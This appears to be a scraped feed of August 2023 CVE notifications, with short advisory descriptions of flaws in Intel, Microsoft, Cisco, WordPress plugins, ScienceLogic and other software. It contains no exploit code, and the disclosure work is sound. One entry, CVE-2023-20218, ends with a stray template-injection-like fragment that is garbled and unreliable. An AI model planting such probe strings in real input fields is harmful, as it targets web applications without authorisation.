🚨 CVE-2023-40256A vulnerability was discovered in Veritas NetBackup Snapshot Manager before 10.2.0.1 that allowed untrusted clients to interact with the RabbitMQ service. This was caused by improper validation of the client certificate due to misconfiguration of the RabbitMQ service. Exploiting this impacts the confidentiality and integrity of messages controlling the backup and restore jobs, and could result in the service becoming unavailable. This impacts only the jobs controlling the backup and restore activities, and does not allow access to (or deletion of) the backup snapshot data itself. This vulnerability is confined to the NetBackup Snapshot Manager feature and does not impact the RabbitMQ instance on the NetBackup primary servers.🎖@cveNotify |
|
| 2023-08-11 06:58:39 |
🚨 CVE-2022-29887Cross-site Scripting (XSS) in some Intel(R) Manageability Commander software before version 2.3 may allow an unauthenticated user to potentially enable escalation of privilege via network access.🎖@cveNotify |
|
| 2023-08-11 06:58:38 |
🚨 CVE-2022-34657Improper input validation in firmware for some Intel(R) PCSD BIOS before version 02.01.0013 may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:37 |
🚨 CVE-2022-36351Improper input validation in some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow an unauthenticated user to potentially enable denial of service via adjacent access.🎖@cveNotify |
|
| 2023-08-11 06:58:36 |
🚨 CVE-2022-36392Improper input validation in some firmware for Intel(R) AMT and Intel(R) Standard Manageability before versions 11.8.94, 11.12.94, 11.22.94, 12.0.93, 14.1.70, 15.0.45, and 16.1.27 in Intel (R) CSME may allow an unauthenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2023-08-11 06:58:32 |
🚨 CVE-2022-37336Improper input validation in BIOS firmware for some Intel(R) NUC may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:31 |
🚨 CVE-2022-38076Improper input validation in some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:30 |
🚨 CVE-2022-38083Improper initialization in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:29 |
🚨 CVE-2022-38102Improper Input validation in firmware for some Intel(R) Converged Security and Management Engine before versions 15.0.45, and 16.1.27 may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:25 |
🚨 CVE-2022-40964Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:24 |
🚨 CVE-2022-41804Unauthorized error injection in Intel(R) SGX or Intel(R) TDX for some Intel(R) Xeon(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:23 |
🚨 CVE-2022-41984Protection mechanism failure for some Intel(R) Arc(TM) graphics cards A770 and A750 sold between October of 2022 and December of 2022 may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:19 |
🚨 CVE-2022-43505Insufficient control flow management in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:18 |
🚨 CVE-2022-44612Use of hard-coded credentials in some Intel(R) Unison(TM) software before version 10.12 may allow an authenticated user user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-11 06:58:17 |
🚨 CVE-2022-45112Improper access control in some Intel(R) VROC software before version 8.0.0.4035 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-10 23:58:45 |
🚨 CVE-2023-38188Azure Apache Hadoop Spoofing Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:44 |
🚨 CVE-2023-38186Windows Mobile Device Management Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:43 |
🚨 CVE-2023-38180.NET and Visual Studio Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:42 |
🚨 CVE-2023-38254Microsoft Message Queuing Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:38 |
🚨 CVE-2023-36895Microsoft Outlook Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:37 |
🚨 CVE-2023-36897Visual Studio Tools for Office Runtime Spoofing Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:36 |
🚨 CVE-2023-36910Microsoft Message Queuing Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:32 |
🚨 CVE-2023-36912Microsoft Message Queuing Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:31 |
🚨 CVE-2023-35385Microsoft Message Queuing Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:30 |
🚨 CVE-2023-35390.NET and Visual Studio Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:26 |
🚨 CVE-2023-35377Microsoft Message Queuing Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-08-10 23:58:25 |
🚨 CVE-2023-28129Desktop & Server Management (DSM) may have a possible execution of arbitrary commands.🎖@cveNotify |
|
| 2023-08-10 23:58:24 |
🚨 CVE-2023-32561A previously generated artifact by an administrator could be accessed by an attacker. The contents of this artifact could lead to authentication bypass. Fixed in version 6.4.1.🎖@cveNotify |
|
| 2023-08-10 18:58:17 |
🚨 CVE-2022-47636A DLL hijacking vulnerability has been discovered in OutSystems Service Studio 11 11.53.30 build 61739. When a user open a .oml file (OutSystems Modeling Language), the application will load the following DLLs from the same directory av_libGLESv2.dll, libcef.DLL, user32.dll, and d3d10warp.dll. Using a crafted DLL, it is possible to execute arbitrary code in the context of the current logged in user.🎖@cveNotify |
|
| 2023-08-10 18:58:16 |
🚨 CVE-2023-39976log_blackbox.c in libqb before 2.0.8 allows a buffer overflow via long log messages because the header size is not considered.🎖@cveNotify |
|
| 2023-08-10 16:58:29 |
🚨 CVE-2023-38699MindsDB's AI Virtual Database allows developers to connect any AI/ML model to any datasource. Prior to version 23.7.4.0, a call to requests with `verify=False` disables SSL certificate checks. This rule enforces always verifying SSL certificates for methods in the Requests library. In version 23.7.4.0, certificates are validated by default, which is the desired behavior.🎖@cveNotify |
|
| 2023-08-10 16:58:28 |
🚨 CVE-2023-39107An arbitrary file overwrite vulnerability in NoMachine Free Edition and Enterprise Client for macOS before v8.8.1 allows attackers to overwrite root-owned files by using hardlinks.🎖@cveNotify |
|
| 2023-08-10 16:58:27 |
🚨 CVE-2023-37543Cacti before 1.2.6 allows IDOR (Insecure Direct Object Reference) for accessing any graph via a modified local_graph_id parameter to graph_xport.php. This is a different vulnerability than CVE-2019-16723.🎖@cveNotify |
|
| 2023-08-10 16:58:26 |
🚨 CVE-2023-38830An information leak in PHPJabbers Yacht Listing Script v1.0 allows attackers to export clients' credit card numbers from the Reservations module.🎖@cveNotify |
|
| 2023-08-10 16:58:25 |
🚨 CVE-2023-39776A File Upload vulnerability in PHPJabbers Ticket Support Script v3.2 allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2023-08-10 16:58:24 |
🚨 CVE-2023-39954user_oidc provides the OIDC connect user backend for Nextcloud, an open-source cloud platform. Starting in version 1.0.0 and prior to version 1.3.3, an attacker that obtained at least read access to a snapshot of the database can impersonate the Nextcloud server towards linked servers. user_oidc 1.3.3 contains a patch. No known workarounds are available.🎖@cveNotify |
|
| 2023-08-10 16:58:23 |
🚨 CVE-2023-39955Notes is a note-taking app for Nextcloud, an open-source cloud platform. Starting in version 4.4.0 and prior to version 4.8.0, when creating a note file with HTML, the content is rendered in the preview instead of the file being offered to download. Nextcloud Notes app version 4.8.0 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2023-08-10 16:58:20 |
🚨 CVE-2023-20216A vulnerability in the privilege management functionality of all Cisco BroadWorks server types could allow an authenticated, local attacker to elevate privileges to root on an affected system. This vulnerability is due to incorrect implementation of user role permissions. An attacker could exploit this vulnerability by authenticating to the application as a user with the BWORKS or BWSUPERADMIN role and issuing crafted commands on an affected system. A successful exploit could allow the attacker to execute commands beyond the sphere of their intended access level, including initiating installs or running operating system commands with elevated permissions. There are workarounds that address this vulnerability.🎖@cveNotify |
|
| 2023-08-10 16:58:19 |
🚨 CVE-2023-4196Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit prior to 2.6.3.🎖@cveNotify |
|
| 2023-08-10 16:58:18 |
🚨 CVE-2023-3570In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with low privileges may use a specific HTTP DELETE request to gain full access to the device.🎖@cveNotify |
|
| 2023-08-10 16:58:17 |
🚨 CVE-2023-3569In PHOENIX CONTACTs TC ROUTER and TC CLOUD CLIENT in versions prior to 2.07.2 as well as CLOUD CLIENT 1101T-TX/TX prior to 2.06.10 an authenticated remote attacker with admin privileges could upload a crafted XML file which causes a denial-of-service.🎖@cveNotify |
|
| 2023-08-10 16:58:15 |
🚨 CVE-2023-0525Weak Encoding for Password vulnerability in Mitsubishi Electric Corporation GOT2000 Series GT27 model versions 01.49.000 and prior, GT25 model versions 01.49.000 and prior, GT23 model versions 01.49.000 and prior, GT21 model versions 01.49.000 and prior, GOT SIMPLE Series GS25 model versions 01.49.000 and prior, GS21 model versions 01.49.000 and prior, GT Designer3 Version1 (GOT2000) versions 1.295H and prior and GT SoftGOT2000 versions 1.295H and prior allows a remote unauthenticated attacker to obtain plaintext passwords by sniffing packets containing encrypted passwords and decrypting the encrypted passwords, in the case of transferring data with GT Designer3 Version1(GOT2000) and GOT2000 Series or GOT SIMPLE Series with the Data Transfer Security function enabled, or in the case of transferring data by the SoftGOT-GOT link function with GT SoftGOT2000 and GOT2000 series with the Data Transfer Security function enabled.🎖@cveNotify |
|
| 2023-08-10 16:58:14 |
🚨 CVE-2023-3373Predictable Exact Value from Previous Values vulnerability in Mitsubishi Electric Corporation GOT2000 Series GT21 model versions 01.49.000 and prior and GOT SIMPLE Series GS21 model versions 01.49.000 and prior allows a remote unauthenticated attacker to hijack data connections (session hijacking) or prevent legitimate users from establishing data connections (to cause DoS condition) by guessing the listening port of the data connection on FTP server and connecting to it.🎖@cveNotify |
|
| 2023-08-10 10:58:18 |
🚨 CVE-2022-30308In Festo Controller CECC-X-M1 product family in multiple versions, the http-endpoint "cecc-x-web-viewer-request-on" POST request doesn’t check for port syntax. This can result in unauthorized execution of system commands with root privileges due to improper access control command injection.🎖@cveNotify |
|
| 2023-08-10 10:58:17 |
🚨 CVE-2022-30309In Festo Controller CECC-X-M1 product family in multiple versions, the http-endpoint "cecc-x-web-viewer-request-off" POST request doesn’t check for port syntax. This can result in unauthorized execution of system commands with root privileges due to improper access control command injection.🎖@cveNotify |
|
| 2023-08-10 10:58:14 |
🚨 CVE-2022-30310In Festo Controller CECC-X-M1 product family in multiple versions, the http-endpoint "cecc-x-acknerr-request" POST request doesn’t check for port syntax. This can result in unauthorized execution of system commands with root privileges due to improper access control command injection.🎖@cveNotify |
|
| 2023-08-10 10:58:13 |
🚨 CVE-2023-4276The Absolute Privacy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1. This is due to missing nonce validation on the 'abpr_profileShortcode' function. This makes it possible for unauthenticated attackers to change user email and password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-08-10 10:58:12 |
🚨 CVE-2023-3772A flaw was found in the Linux kernel’s IP framework for transforming packets (XFRM subsystem). This issue may allow a malicious user with CAP_NET_ADMIN privileges to directly dereference a NULL pointer in xfrm_update_ae_params(), leading to a possible kernel crash and denial of service.🎖@cveNotify |
|
| 2023-08-10 00:58:23 |
🚨 CVE-2023-35838The WireGuard client 0.5.3 on Windows insecurely configures the operating system and firewall such that traffic to a local network that uses non-RFC1918 IP addresses is blocked. This allows an adversary to trick the victim into blocking IP traffic to selected IP addresses and services even while the VPN is enabled. NOTE: the tunnelcrack.mathyvanhoef.com website uses this CVE ID to refer more generally to "LocalNet attack resulting in the blocking of traffic" rather than to only WireGuard.🎖@cveNotify |
|
| 2023-08-10 00:58:19 |
🚨 CVE-2023-36672An issue was discovered in the Clario VPN client through 5.9.1.1662 for macOS. The VPN client insecurely configures the operating system such that traffic to the local network is sent in plaintext outside the VPN tunnel even if the local network is using a non-RFC1918 IP subnet. This allows an adversary to trick the victim into sending arbitrary IP traffic in plaintext outside the VPN tunnel. NOTE: the tunnelcrack.mathyvanhoef.com website uses this CVE ID to refer more generally to "LocalNet attack resulting in leakage of traffic in plaintext" rather than to only Clario.🎖@cveNotify |
|
| 2023-08-10 00:58:18 |
🚨 CVE-2023-33241Crypto wallets implementing the GG18 or GG20 TSS protocol might allow an attacker to extract a full ECDSA private key by injecting a malicious pallier key and cheating in the range proof. Depending on the Beta parameters chosen in the protocol implementation, the attack might require 16 signatures or more fully exfiltrate the other parties' private key shares.🎖@cveNotify |
|
| 2023-08-10 00:58:17 |
🚨 CVE-2023-33242Crypto wallets implementing the Lindell17 TSS protocol might allow an attacker to extract the full ECDSA private key by exfiltrating a single bit in every signature attempt (256 in total) because of not adhering to the paper's security proof's assumption regarding handling aborts after a failed signature.🎖@cveNotify |
|
| 2023-08-09 22:58:40 |
🚨 CVE-2023-2754The Cloudflare WARP client for Windows assigns loopback IPv4 addresses for the DNS Servers, since WARP acts as local DNS server that performs DNS queries in a secure manner, however, if a user is connected to WARP over an IPv6-capable network, te WARP client did not assign loopback IPv6 addresses but Unique Local Addresses, which under certain conditions could point towards unknown devices in the same local network which enables an Attacker to view DNS queries made by the device.🎖@cveNotify |
|
| 2023-08-09 22:58:39 |
🚨 CVE-2023-33906In Contacts Service, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-08-09 22:58:38 |
🚨 CVE-2023-28468An issue was discovered in FvbServicesRuntimeDxe in Insyde InsydeH2O with kernel 5.0 through 5.5. The FvbServicesRuntimeDxe SMM module exposes an SMI handler that allows an attacker to interact with the SPI flash at run-time from the OS.🎖@cveNotify |
|
| 2023-08-09 22:58:34 |
🚨 CVE-2020-26082A vulnerability in the zip decompression engine of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass content filters that are configured on an affected device. The vulnerability is due to improper handling of password-protected zip files. An attacker could exploit this vulnerability by sending a malicious file inside a crafted zip-compressed file to an affected device. A successful exploit could allow the attacker to bypass configured content filters that would normally drop the email.🎖@cveNotify |
|
| 2023-08-09 22:58:33 |
🚨 CVE-2023-39527PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to cross-site scripting through the `isCleanHTML` method. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds.🎖@cveNotify |
|
| 2023-08-09 22:58:32 |
🚨 CVE-2023-39526PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to remote code execution through SQL injection and arbitrary file write in the back office. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds.🎖@cveNotify |
|
| 2023-08-09 22:58:29 |
🚨 CVE-2023-23347HCL DRYiCE iAutomate is affected by the use of a broken cryptographic algorithm. An attacker can potentially compromise the confidentiality and integrity of sensitive information.🎖@cveNotify |
|
| 2023-08-09 22:58:28 |
🚨 CVE-2023-33469In instances where the screen is visible and remote mouse connection is enabled, KramerAV VIA Connect (2) and VIA Go (2) devices with a version prior to 4.0.1.1326 can be exploited to achieve local code execution at the root level.🎖@cveNotify |
|
| 2023-08-09 22:58:27 |
🚨 CVE-2023-38347An issue was discovered in LWsystems Benno MailArchiv 2.10.1. Attackers can cause XSS via JavaScript content to a mailbox.🎖@cveNotify |
|
| 2023-08-09 22:58:23 |
🚨 CVE-2023-33466Orthanc before 1.12.0 allows authenticated users with access to the Orthanc API to overwrite arbitrary files on the file system, and in specific deployment scenarios allows the attacker to overwrite the configuration, which can be exploited to trigger Remote Code Execution (RCE).🎖@cveNotify |
|
| 2023-08-09 22:58:22 |
🚨 CVE-2022-48592A SQL injection vulnerability exists in the vendor_country parameter of the “vendor print report” feature of the ScienceLogic SL1 that takes unsanitized user?controlled input and passes it directly to a SQL query. This allows for the injection of arbitrary SQL before being executed against the database.🎖@cveNotify |
|
| 2023-08-09 21:58:30 |
🚨 CVE-2022-48595A SQL injection vulnerability exists in the “ticket template watchers” feature of the ScienceLogic SL1 that takes unsanitized user?controlled input and passes it directly to a SQL query. This allows for the injection of arbitrary SQL before being executed against the database.🎖@cveNotify |
|
| 2023-08-09 21:58:29 |
🚨 CVE-2022-48598A SQL injection vulnerability exists in the “reporter events type date” feature of the ScienceLogic SL1 that takes unsanitized user?controlled input and passes it directly to a SQL query. This allows for the injection of arbitrary SQL before being executed against the database.🎖@cveNotify |
|
| 2023-08-09 21:58:25 |
🚨 CVE-2022-48600A SQL injection vulnerability exists in the “notes view” feature of the ScienceLogic SL1 that takes unsanitized user?controlled input and passes it directly to a SQL query. This allows for the injection of arbitrary SQL before being executed against the database.🎖@cveNotify |
|
| 2023-08-09 21:58:24 |
🚨 CVE-2022-48603A SQL injection vulnerability exists in the “message viewer iframe” feature of the ScienceLogic SL1 that takes unsanitized user?controlled input and passes it directly to a SQL query. This allows for the injection of arbitrary SQL before being executed against the database.🎖@cveNotify |
|
| 2023-08-09 21:58:19 |
🚨 CVE-2023-23346HCL DRYiCE MyCloud is affected by the use of a broken cryptographic algorithm. An attacker can potentially compromise the confidentiality and integrity of sensitive information.🎖@cveNotify |
|
| 2023-08-09 21:58:18 |
🚨 CVE-2023-38999A Cross-Site Request Forgery (CSRF) in the System Halt API (/system/halt) of OPNsense before 23.7 allows attackers to cause a Denial of Service (DoS) via a crafted GET request.🎖@cveNotify |
|
| 2023-08-09 21:58:13 |
🚨 CVE-2023-39001A command injection vulnerability in the component diag_backup.php of OPNsense before 23.7 allows attackers to execute arbitrary commands via a crafted backup configuration file.🎖@cveNotify |
|
| 2023-08-09 21:58:12 |
🚨 CVE-2023-39004Insecure permissions in the configuration directory (/conf/) of OPNsense before 23.7 allow attackers to access sensitive information (e.g., hashed root password) which could lead to privilege escalation.🎖@cveNotify |
|
| 2023-08-09 18:58:40 |
🚨 CVE-2023-36220Directory Traversal vulnerability in Textpattern CMS v4.8.8 allows a remote authenticated attacker to execute arbitrary code and gain access to sensitive information via the plugin Upload function.🎖@cveNotify |
|
| 2023-08-09 18:58:39 |
🚨 CVE-2021-24916The Qubely WordPress plugin before 1.8.6 allows unauthenticated user to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.🎖@cveNotify |
|
| 2023-08-09 18:58:38 |
🚨 CVE-2023-38765SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive information via the membermonth parameter within the /QueryView.php.🎖@cveNotify |
|
| 2023-08-09 18:58:37 |
🚨 CVE-2023-0604The WP Food Manager WordPress plugin before 1.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-08-09 18:58:36 |
🚨 CVE-2023-2843The MultiParcels Shipping For WooCommerce WordPress plugin before 1.14.15 does not properly sanitize and escape a parameter before using it in an SQL statement, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.🎖@cveNotify |
|
| 2023-08-09 18:58:31 |
🚨 CVE-2023-38764SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive information via the birthmonth and percls parameters within the /QueryView.php.🎖@cveNotify |
|
| 2023-08-09 18:58:30 |
🚨 CVE-2023-3365The MultiParcels Shipping For WooCommerce WordPress plugin before 1.14.14 does not have authorisation when deleting shipment, allowing any authenticated users, such as subscriber to delete arbitrary shipment🎖@cveNotify |
|
| 2023-08-09 18:58:29 |
🚨 CVE-2023-3492The WP Shopping Pages WordPress plugin through 1.14 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.🎖@cveNotify |
|
| 2023-08-09 18:58:28 |
🚨 CVE-2023-3524The WPCode WordPress plugin before 2.0.13.1 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting🎖@cveNotify |
|
| 2023-08-09 18:58:27 |
🚨 CVE-2023-3575The Quiz And Survey Master WordPress plugin before 8.1.11 does not properly sanitize and escape question titles, which could allow users with the Contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-08-09 18:58:23 |
🚨 CVE-2023-3671The MultiParcels Shipping For WooCommerce WordPress plugin before 1.15.4 does not sanitise and escape various parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-08-09 18:58:22 |
🚨 CVE-2023-20804In imgsys, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07199773; Issue ID: ALPS07326384.🎖@cveNotify |
|
| 2023-08-09 18:58:21 |
🚨 CVE-2023-38763SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive information via the FundRaiserID parameter within the /FundRaiserEditor.php endpoint.🎖@cveNotify |
|
| 2023-08-09 18:58:20 |
🚨 CVE-2023-23757Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability allows SQL Injection.🎖@cveNotify |
|
| 2023-08-09 18:58:16 |
🚨 CVE-2023-23758Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability allows SQL Injection.🎖@cveNotify |
|
| 2023-08-09 18:58:15 |
🚨 CVE-2023-34476Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability allows SQL Injection.🎖@cveNotify |
|
| 2023-08-09 18:58:14 |
🚨 CVE-2023-34477Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability allows SQL Injection.🎖@cveNotify |
|
| 2023-08-09 18:58:13 |
🚨 CVE-2023-39508Execution with Unnecessary Privileges, : Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Airflow.The "Run Task" feature enables authenticated user to bypass some of the restrictions put in place. It allows to execute code in the webserver context as well as allows to bypas limitation of access the user has to certain DAGs. The "Run Task" feature is considered dangerous and it has been removed entirely in Airflow 2.6.0This issue affects Apache Airflow: before 2.6.0.🎖@cveNotify |
|
| 2023-08-09 16:58:31 |
🚨 CVE-2023-4182A vulnerability, which was classified as critical, was found in SourceCodester Inventory Management System 1.0. This affects an unknown part of the file edit_sell.php. The manipulation of the argument up_pid leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-236217 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-09 16:58:30 |
🚨 CVE-2023-4184A vulnerability was found in SourceCodester Inventory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file sell_return.php. The manipulation of the argument pid leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-236219.🎖@cveNotify |
|
| 2023-08-09 16:58:29 |
🚨 CVE-2023-20218A vulnerability in web-based management interface of Cisco SPA500 Series Analog Telephone Adapters (ATAs) could allow an authenticated, remote attacker to to modify a web page in the context of a user's browser. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to alter the contents of a web page to redirect the user to potentially malicious websites, or the attacker could use this vulnerability to conduct further client-side attacks. Cisco will not release software updates that address this vulnerability. {{value}} ["%7b%7bvalue%7d%7d"])}]]🎖@cveNotify |
|
| 2023-08-09 16:58:26 |
🚨 CVE-2023-3749A local user could edit the VideoEdge configuration file and interfere with VideoEdge operation.🎖@cveNotify |
|
| 2023-08-09 16:58:25 |
🚨 CVE-2023-33383Shelly 4PM Pro four-channel smart switch 0.11.0 allows an attacker to trigger a BLE out of bounds read fault condition that results in a device reload.🎖@cveNotify |
|
| 2023-08-09 16:58:24 |
🚨 CVE-2023-20795In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07864900; Issue ID: ALPS07864900.🎖@cveNotify |
|
| 2023-08-09 16:58:23 |
🚨 CVE-2023-20793In apu, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07767818; Issue ID: ALPS07767818.🎖@cveNotify |
|
| 2023-08-09 16:58:20 |
🚨 CVE-2023-3953A CWE-119: Improper Restriction of Operations within the Bounds of a MemoryBuffer vulnerability exists that could cause memory corruption when an authenticated useropens a tampered log file from GP-Pro EX.🎖@cveNotify |
|
| 2023-08-09 16:58:19 |
🚨 CVE-2023-20801In imgsys, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07420968; Issue ID: ALPS07420968.🎖@cveNotify |
|
| 2023-08-09 16:58:18 |
🚨 CVE-2020-23564File Upload vulnerability in SEMCMS 3.9 allows remote attackers to run arbitrary code via SEMCMS_Upfile.php.🎖@cveNotify |
|
| 2023-08-09 16:58:14 |
🚨 CVE-2023-4188 SQL Injection in GitHub repository instantsoft/icms2 prior to 2.16.1-git.🎖@cveNotify |
|
| 2023-08-09 16:58:13 |
🚨 CVE-2023-20569A side channel vulnerability on some of the AMD CPUs may allow an attacker to influence the return address prediction. This may result in speculative execution at an attacker-controlled?address, potentially leading to information disclosure.🎖@cveNotify |
|
| 2023-08-09 16:58:12 |
🚨 CVE-2022-45788A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists that could cause arbitrary code execution, denial of service and loss of confidentiality & integrity when a malicious project file is loaded onto the controller. Affected Products: EcoStruxure Control Expert (All Versions), EcoStruxure Process Expert (All Versions), Modicon M340 CPU - part numbers BMXP34* (All Versions), Modicon M580 CPU - part numbers BMEP* and BMEH* (All Versions), Modicon M580 CPU Safety - part numbers BMEP58*S and BMEH58*S (All Versions), Modicon Momentum Unity M1E Processor - 171CBU* (All Versions), Modicon MC80 - BMKC80 (All Versions), Legacy Modicon Quantum - 140CPU65* and Premium CPUs - TSXP57* (All Versions)🎖@cveNotify |
|
| 2023-08-09 14:58:34 |
🚨 CVE-2023-39209Improper input validation in Zoom Desktop Client for Windows before 5.15.5 may allow an authenticated user to enable an information disclosure via network access.🎖@cveNotify |
|
| 2023-08-09 14:58:33 |
🚨 CVE-2023-39210Cleartext storage of sensitive information in Zoom Client SDK for Windows before 5.15.0 may allow an authenticated user to enable an information disclosure via local access.🎖@cveNotify |
|
| 2023-08-09 14:58:32 |
🚨 CVE-2023-39211Improper privilege management in Zoom Desktop Client for Windows and Zoom Rooms for Windows before 5.15.5 may allow an authenticated user to enable an information disclosure via local access.🎖@cveNotify |
|
| 2023-08-09 14:58:31 |
🚨 CVE-2023-39212Untrusted search path in Zoom Rooms for Windows before version 5.15.5 may allow an authenticated user to enable a denial of service via local access.🎖@cveNotify |
|
| 2023-08-09 14:58:30 |
🚨 CVE-2023-39213Improper neutralization of special elements in Zoom Desktop Client for Windows and Zoom VDI Client before 5.15.2 may allow an unauthenticated user to enable an escalation of privilege via network access.🎖@cveNotify |
|
| 2023-08-09 14:58:26 |
🚨 CVE-2023-39951OpenTelemetry Java Instrumentation provides OpenTelemetry auto-instrumentation and instrumentation libraries for Java. OpenTelemetry Java Instrumentation prior to version 1.28.0 contains an issue related to the instrumentation of Java applications using the AWS SDK v2 with Amazon Simple Email Service (SES) v1 API. When SES POST requests are instrumented, the query parameters of the request are inserted into the trace `url.path` field. This behavior leads to the http body, containing the email subject and message, to be present in the trace request url metadata. Any user using a version before 1.28.0 of OpenTelemetry Java Instrumentation to instrument AWS SDK v2 call to SES’s v1 SendEmail API is affected. The e-mail content sent to SES may end up in telemetry backend. This exposes the e-mail content to unintended audiences. The issue can be mitigated by updating OpenTelemetry Java Instrumentation to version 1.28.0 or later.🎖@cveNotify |
|
| 2023-08-09 14:58:25 |
🚨 CVE-2023-31449An issue was discovered in Paessler PRTG Network Monitor 23.2.83.1760 x64. To exploit the vulnerability, a authenticated user can create a WMI Custom Sensor. When creating this sensor, the user can set the WQL message that should be sent from the PRTG device. This input parameter contains a path traversal vulnerability that allows an attacker to choose arbitrary files from the system.🎖@cveNotify |
|
| 2023-08-09 14:58:24 |
🚨 CVE-2023-31450An issue was discovered in Paessler PRTG Network Monitor 23.2.83.1760 x64. To exploit the vulnerability, a authenticated user can create a SQL Sensor. When creating this sensor, the user can set the SQL message that should be sent from the PRTG device. This input parameter contains a path traversal vulnerability that allows an attacker to choose arbitrary files from the system. They will be transmitted over the internet to the attacker's machine.🎖@cveNotify |
|
| 2023-08-09 14:58:20 |
🚨 CVE-2023-31452An issue was discovered in Paessler PRTG Network Monitor 23.2.83.1760 x64. The NetApp Volume Sensor transmits cleartext credentials over the network when the HTTP protocol is selected. This can be triggered remotely via a CSRF by simply sending a controls/addsensor3.htm link to a logged-in victim.🎖@cveNotify |
|
| 2023-08-09 14:58:19 |
🚨 CVE-2023-32782An issue was discovered in Paessler PRTG Network Monitor 23.2.83.1760. Due to command-line parameter injection and an undocumented debug feature flag, an attacker can utilize the DICOM sensor to write arbitrary data to the disk. This can be utilized to write a custom EXE(.bat) sensor, that will then run. This primitive gives remote code execution.🎖@cveNotify |
|
| 2023-08-09 14:58:18 |
🚨 CVE-2023-24015A partial DoS vulnerability has been detected in the Reports section, exploitable by a malicious authenticated user forcing a report to be saved with its name set as null.The reports section will be partially unavailable for all later attempts to use it, with the report list seemingly stuck on loading.🎖@cveNotify |
|
